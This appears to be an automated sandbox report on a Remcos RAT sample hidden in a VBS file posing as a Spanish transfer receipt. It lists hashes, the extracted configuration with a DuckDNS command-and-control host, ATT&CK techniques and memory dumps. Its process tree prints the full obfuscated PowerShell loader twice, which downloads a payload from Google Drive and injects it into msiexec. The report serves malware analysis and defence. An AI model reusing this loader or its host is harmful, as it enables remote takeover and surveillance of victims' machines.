remcos | b1475086f2f81e2aca88d89cb0620f04e8d0b0a20b956821a0d2efe1b65ce060

General

Target

Recibo de transferencia·pdf.vbs
Size

80KB
MD5

a510a741cf02891a5ae7268b7b92b9b8
SHA1

2740b1d3da34dab2396388ebb2c97763a3164ce5
SHA256

b1475086f2f81e2aca88d89cb0620f04e8d0b0a20b956821a0d2efe1b65ce060
SHA512

f8b09143c1fde918ef01c508c781af213c934d332956c43acbaba6116cd3d3874db8315d1e15eeb8da33e52fc0898569b8c95a5540051be3de48731cf89fb091
SSDEEP

1536:sjYl/iQZBql+3LAtEhHt1TtcjQ+yztqwT7C25jmiS8ybyf:sjYB7ZAoHCyzMy75y2f

Score

10^/10

remcos remotehost discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WDQFG0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 9 IoCs

flow	pid	Process
16	2332	powershell.exe
18	2332	powershell.exe
43	2668	msiexec.exe
47	2668	msiexec.exe
50	2668	msiexec.exe
52	2668	msiexec.exe
53	2668	msiexec.exe
58	2668	msiexec.exe
60	2668	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2332	powershell.exe
4676	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	drive.google.com
16	drive.google.com
43	drive.google.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2332	powershell.exe
4676	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2668	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4676	powershell.exe
2668	msiexec.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4676 set thread context of 2668	4676	powershell.exe	94

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2332	powershell.exe
2332	powershell.exe
4676	powershell.exe
4676	powershell.exe
4676	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4676	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2668	msiexec.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 1468 wrote to memory of 2332	1468	WScript.exe	83
PID 1468 wrote to memory of 2332	1468	WScript.exe	83
PID 4676 wrote to memory of 2668	4676	powershell.exe	94
PID 4676 wrote to memory of 2668	4676	powershell.exe	94
PID 4676 wrote to memory of 2668	4676	powershell.exe	94
PID 4676 wrote to memory of 2668	4676	powershell.exe	94
PID 4676 wrote to memory of 2668	4676	powershell.exe	94

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Recibo de transferencia·pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised 'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt. FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens (Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens (Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised 'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians) rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu ,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens (Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug= Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6 Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens (Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised 'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi ');Revanchistens $Carbonatisation;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Panglossian Faktotumerne udfrelserne #>;$Espes='Nednormeringen83';<#Pirat Misjudgment Retroaktiv #>;$Buedes=$host.PrivateData;If ($Buedes) {$Burundieres++;}function Balladised($Alfedronnings47){$Udfrier=$Storcirklernes+$Alfedronnings47.Length-$Burundieres;for( $Haltered=5;$Haltered -lt $Udfrier;$Haltered+=6){$Sparebssernes+=$Alfedronnings47[$Haltered];}$Sparebssernes;}function Revanchistens($Nedlggende){ &($Rhabditis) ($Nedlggende);}$Eral219=Balladised 'StrstMDi sooUn erz SpliiDataololieflN.stlaTyp.s/Spast5Sved..Boeth0 akan pil( TiphW GastiAdvokn Dispd AmagoPurunwArch.s Eksp Bih NZygotTSeque soloe1 Chi.0Varef.Ragas0Cradl;Tienn MurinWBulleiCo.tenAnabo6at ri4Emoll;witch MortexPasti6Unsur4Sil o;Skole PolarrVanhevFrede:Sem c1Telep2Utill1 Upfl.stron0revel)Lauda MaillGBee aeBanklcScallk PaxioFarve/ Fois2Mul i0E end1Eryop0Misad0Intra1Jordb0f.ede1.rers IndheFsadleiG overS.arpetribuf .unjoDr ylxSolda/ Reo,1Ve ne2Subfe1Bact,.Resig0 Ret ';$Quagmirier=Balladised ' Vagau SmarsU dereLetlbrPrefi-harveAHelv GD optE.nindNA,rsdTMedal ';$Tillodont=Balladised 'U svehI.skat eeut .tjnpTndesspos t:Tsun,/Launc/OverfdForplrL rriiM,cigvAnisoeTabul.Waltog VrdioNonstoTrl ogreapolArchaeCinde.G,arycAfgr,o anim tave/Adjuru ViftcKoebu?Mod,aeUnderxBacktpGavekoTetrar ersotU,der=ArbejdNonproByde wG antn Fratl Pagio Pe pa ForpdAkkil&LytteiAvinddSka t=svire1Otocem refaVBeh nv ResesUnf.mI DiplVVanteWSnust7Udsig- S ovx Side9Ho orDDatabjJapanCAdonio Offe7OnicouDraabv F ge1 dioxZAprilODikkeoOdou Z MemptSrtjeTDamilNEpi azUngdoVStaliEFingeFPistoBPoppi5antem ';$Semimanagerial=Balladised 'Jal u>Skvat ';$Rhabditis=Balladised 'R,undiRes,aEUns axAmety ';$Scombroidea='Kohave';$Hypersensuously='\Margenindstilling.Sys';Revanchistens (Balladised 'Rockl$Blubbg HooclRe.isoSnitcbS rumaUnderlScrat:un exAtonesrSt rbv hum eDiskpmSlagfsHedess olsiPertigKursetutilg=Inter$ReannePer,sn ,evivAutor:Br.araMedmepSkibspOpf.ldTetr a OvultIdealaSlett+ nges$ ,ervHMinilyAiracpLeveaeKil erKbmanstid,eeShopfnPrav sTe rauUdv.koOp rauTewtasHom nlbundfy,absl ');Revanchistens (Balladised 'Lenna$Selvbgravetl PrepoSemidbFleksawarmhlElkos:Ov rcO LayevHy ereDriftrTo ollSett,sDemagsT kpleJord.t ealls .lfe=Buchs$ConosTRomanistvkolNickllFejl,omidsodKlyngo EngonSuba t lmu.TavlesFrie.psuperl TrafiComedtPenda( oris$ FlugS Je ne PhysmFis eiI,termBeci aSkrifn WorsaBlo.mgFornyeIntr.rIdrtsi Ma,ta Ansal svbc) Filn ');Revanchistens (Balladised 'Forgj[tandsNUnc ie sangt P am.JournSB rtkeScriprBagsivU.duciBrle.cBan eeSikrePCardooOv,rmi TilbnUdad tBarriMVaernaPsychn.eminaPrimpggenneeSkib,rLep o]Forre:Dever:DeodoS SemeeFlaggcorganuSmkfyr CuttiSevertAkvaryCruciPStandrMonk,oT utot .nfeoSofa,c Sammo Antil flir Gimme= Udva Mejed[ DomiN UdpleStudct Eph . PlanSQerumePilotcFordruSek.dr Thebi KnartIndusyExtraPGif wrDeadboDecomtErminovsentc FleroJakoblMoti,T Repoy cinepafslueUsort]Bever: Und :PseudTDragslLikrss.assa1Rigou2Supra ');$Tillodont=$Overlssets[0];$Suspensoriers34=(Balladised 'Facad$ret eGAntrolSlagto Bia BProl,AMatriLBegum:CanopAhuberD PlayvTsem.oRemodkseveraPlum tT,mlekP,lsaoTh rmNDylanTAccelo alkeRPercue Sp lrSymassstai =KartonFremme Su,ewN.sic-Stud.OUp,albCatecJTaveseomby,CTi ett Bonn Hirp.STriv YBo pes,isteTCrocoEFo.taM,latt. FrodnVenefEPlasttSeman. DiviWAfreneYndtuBTellucUniveL iviISlopee ForpN PoddTOdori ');Revanchistens ($Suspensoriers34);Revanchistens (Balladised 'Frugt$.sesvARadikd WorkvCurteoAnne,kGrinda ontatD.zenkRevolo nglen Om stEttaloCrystrDetereFo svrfemtes afi.N sseHFo,bret.ropa sheldEksameCentrrAdr as c rc[Aktio$MentiQCon.euSuavia Ant gAlbi mAithti.rinsrGreeniTetcheFrih.rBrug ]Betha=Coqu.$Skru EAnmrkr Batha Brugl Flor2Ant q1Gummi9Respe ');$Indeterminateness=Balladised 'monor$ Ud,iAwildcdTribuvLooseoAlle kLukkeaHakamtFjer kHe rioOpsvunPha.nt Introve strUnma e La tr slutsRetra.SafirDFrankoTur,sw p ykn PibelSlip.olovfsaFarved SoleFLigniistricl olvredenar(Montr$BintjTbreviiIngenlMatamlgreneoK lesdSergeo ekvinstvkot Kn.r,Dags.$RetinRSyranoenvelvBen vdCa loyBas arIsenke Co,enSaddleG.atesCit o)satir ';$Rovdyrenes=$Arvemssigt;Revanchistens (Balladised 'Raget$ ennuGLibidLFamiloCommybprecoAEnerglGloba:OmfanPM culIN.lliL DobbK Skumo.imorMCirkuBPhantIundernberigAKrimiTAfmeliInjurODev,lnGratiePartir Sprj=V ldt(SammeTunoveEOplsnsGangltKon.u-,indepSaliaaargentTr peHbretw Fines$VibrorTotalOVersiV Quadd onpaYKr mer SoldEBasilNTapiseUds us Mjdu)Nonap ');while (!$Pilkombinationer) {Revanchistens (Balladised 'Shr.v$FortrgUltimlRtehao Spejb Stanacalanl Leuk:Ak,liEHorricNachsoMaskisDolorpCatsteO,ertcEnginiDitlefSka eiTempecUngdoa Fanal Impel Skruytolds=Build$StuditPhosprcyanouSolece.laam ') ;Revanchistens $Indeterminateness;Revanchistens (Balladised 'Mark,S F,rmt HuslaTyrisrskrivtSan s-AfvikSAdra.l sevreIrrige Darnp Arr Unpes4Nond ');Revanchistens (Balladised 'Katmo$v.ndfg StivlSquamoM thobDeliva lvelU sen:Ja,anPNedriiAmolalTormekFonduohin emSuperbLabeli InjunB samaIndpat ReseiHalvtoMicron HvidegenlsrAmbol=Inde.(A omaTPubliexanthsHaveetHerre-CommuPElektaStatztMuscuhTwadd ,istr$BrandRDulluo Ytt vGrutcdEmbryyMlkekrM ssee.tivrnGarveeV gsesDians) rome ') ;Revanchistens (Balladised ' Vair$EmittgRe eml LibioSprjtb StudaSnesklBilbi:Lg erR argaeH ndenOutpusRou,ee lastmBaha aUnvicsCraftk nfuliCentrn ArsaeTerrosRib y=Arbej$FavelgTubtalSync o B rab pallaAmb llIsole: Sy hFKasteoAfparrNapalgPleuriBryghvDra teFloranSf esdT lefe ntros Effe+Pigh +Cong.%Al rg$OxyteO IntrvcamemeSulfar HypolSlavosUnshas Ass,e rubutOrdnus Otol.GeschcMechaoWoodcu ,odenOmbaet Coti ') ;$Tillodont=$Overlssets[$Rensemaskines];}$Dralonens=329627;$Haltereddijassociationens=32015;Revanchistens (Balladised ' Sofa$Fer kgUncaulMingeo Hemibscagla Ban lS ump:.orplO S,rfuTimistUn rydPas erLeasiaDiskenCob.ik Bery Afhug= Undi Spot GPlat eLugsptAou l-Su dhCOverbo cl mn Ro.et SodaeRep tn celitudpos Maski$NoninRVerd.oEntrav ndendGeogryZoquerLoutieHeartnSnubbeAboits Ilma ');Revanchistens (Balladised 'In er$ FagogSan,tlOversoArvinbTeknoaEfterlNonob: rgesVAfhrdiPolemd ReuneSelvooVerdeb.inieaRegneaSo ianAktuadPer ooV,dlipCastatIndstaKafeegFab leUhildrKlutze ForpnM.rri1Ame t7Dmpef7Redn B tik=F,lig Proto[CircuSnglesyunders TrestKultie Ju.tmPinta. ScraC MiljoLinienTilmev,freje F ksrundertSymbo] Wind:Unamp:UdfylF nimarSamnooIodatmGerm,BU deraFinmesBurreePilla6 Bekr4TekstS odgtM tchrMus ciT.rninGastrgNo.co(rytt $ KeapOVermeuGpscotVedkedSicinrStaalaKendinskab.kCyst )Igang ');Revanchistens (Balladised 'Cir i$ Sy bgcondulSarcoo PrefbKla.eaM.zarl Riga:Sig.iSRegant takirFeltieplsergBloduk Di.go Mulid Nihie Preds Har .ooid=Speci Vold.[ObersSVenliyc.mifsGoositTr dke Sp,tmR,nve.afledT S nke I cox leet Ukra.,icheEbo ndnPrepocRedegoRandsd Compi We,tnDisseg Arve]Kinco: Korf:nachoAMalvoS tvi CBr okIMin.rIJambo.Kv teG Erine Ra ntFremtS TidstgennerPilkei omtenBogengImmun(Obloq$InvenVDurosiMargidPlaceeHjlpeoSy,urbskvataMar,ka Udrkn SoladAvnesoM,liepN neqt uds,aB,attgVini.eUnaverPerlae Disen Libe1Gusta7Stjpl7 chas)Can p ');Revanchistens (Balladised 'Cathe$AnakrgDecarlparr olavanb JadiasynaglStrmk:SvejsCtusheaFragirPjankbToe oo RadinTrembasippet St eiSadelsQuadra AlgotDeba.i,rafio OptanB.hoo= Tryk$TheekSK geltDenitrKaviteT,ningPentakSpilooIransdMenseeMillesRepin.vold sTrojkuMet obJern sOrchetforurr Ungri Weisn ,oungPunkt(Du ke$BrnemDPyri rBorema Coazl eaktoTele.n Impoe Milin Se isTa.il,Land $ AnatHAntitaSy tel HenstRenseeHan or ,stfeJeremdSark dHelleiRet ojKonseaBowelsCe ers ZymooPurunc Gla.iFonaca Pop tgardeiKart,oF glenRefereImpernUnobjsPhilo)Udsmi ');Revanchistens $Carbonatisation;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
8656d9024ee784c5a827d91d32a93c8b

SHA1
5eb93294b9ea9eb863cfdb13d12bab03f7968d5f

SHA256
71402a68570b9930a7dbf8443cab2fecc896f0b2562f3ea101deb76ca6f0ce34

SHA512
34aad910ec26b969d7d58eeda5ed4f6f659cf04195ecbffe4f1a6f75494e6d1bca5a89f5be29772d8dd05585902bb49d0e738d03106fec9ad65ed020ecce5eb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d34112a7b4df3c9e30ace966437c5e40

SHA1
ec07125ad2db8415cf2602d1a796dc3dfc8a54d6

SHA256
cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf

SHA512
49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jzc2veqc.vtx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Margenindstilling.Sys

Filesize
470KB

MD5
2f6d014bfb8401243b95a2d5190524bc

SHA1
813a93f3ecce3e6ad2c08d90794246b628c53e30

SHA256
4e8209f1210bbc4d89b9894389a5d95902d1b6ef80c651701cc77bb77302ceeb

SHA512
715c7eef4a5a83dd91a38ae4bbfc8ec04c29c2a4e3a3534e21c1f30f7a62c80d1952e9b9cc4fa67e2cb55953ca5cdf957c4deabe293edf745ef1e6e523a47fb7

Download Submit
memory/2332-16-0x00007FF98BB53000-0x00007FF98BB55000-memory.dmp

Filesize
8KB

Download
memory/2332-15-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

Filesize
10.8MB

Download
memory/2332-12-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

Filesize
10.8MB

Download
memory/2332-17-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

Filesize
10.8MB

Download
memory/2332-20-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

Filesize
10.8MB

Download
memory/2332-21-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

Filesize
10.8MB

Download
memory/2332-11-0x00007FF98BB50000-0x00007FF98C611000-memory.dmp

Filesize
10.8MB

Download
memory/2332-1-0x000002067E6B0000-0x000002067E6D2000-memory.dmp

Filesize
136KB

Download
memory/2332-0-0x00007FF98BB53000-0x00007FF98BB55000-memory.dmp

Filesize
8KB

Download
memory/2668-61-0x0000000001210000-0x0000000002464000-memory.dmp

Filesize
18.3MB

Download
memory/2668-60-0x0000000001210000-0x0000000002464000-memory.dmp

Filesize
18.3MB

Download
memory/4676-25-0x0000000004C90000-0x0000000004CF6000-memory.dmp

Filesize
408KB

Download
memory/4676-36-0x0000000005500000-0x0000000005854000-memory.dmp

Filesize
3.3MB

Download
memory/4676-38-0x0000000005AC0000-0x0000000005ADE000-memory.dmp

Filesize
120KB

Download
memory/4676-39-0x0000000005D90000-0x0000000005DDC000-memory.dmp

Filesize
304KB

Download
memory/4676-40-0x0000000007270000-0x00000000078EA000-memory.dmp

Filesize
6.5MB

Download
memory/4676-41-0x0000000006C10000-0x0000000006C2A000-memory.dmp

Filesize
104KB

Download
memory/4676-43-0x0000000006CD0000-0x0000000006CF2000-memory.dmp

Filesize
136KB

Download
memory/4676-44-0x0000000007EA0000-0x0000000008444000-memory.dmp

Filesize
5.6MB

Download
memory/4676-42-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/4676-26-0x0000000004D70000-0x0000000004DD6000-memory.dmp

Filesize
408KB

Download
memory/4676-46-0x0000000008450000-0x000000000B0DD000-memory.dmp

Filesize
44.6MB

Download
memory/4676-24-0x0000000004BF0000-0x0000000004C12000-memory.dmp

Filesize
136KB

Download
memory/4676-23-0x0000000004ED0000-0x00000000054F8000-memory.dmp

Filesize
6.2MB

Download
memory/4676-22-0x00000000021E0000-0x0000000002216000-memory.dmp

Filesize
216KB

Download

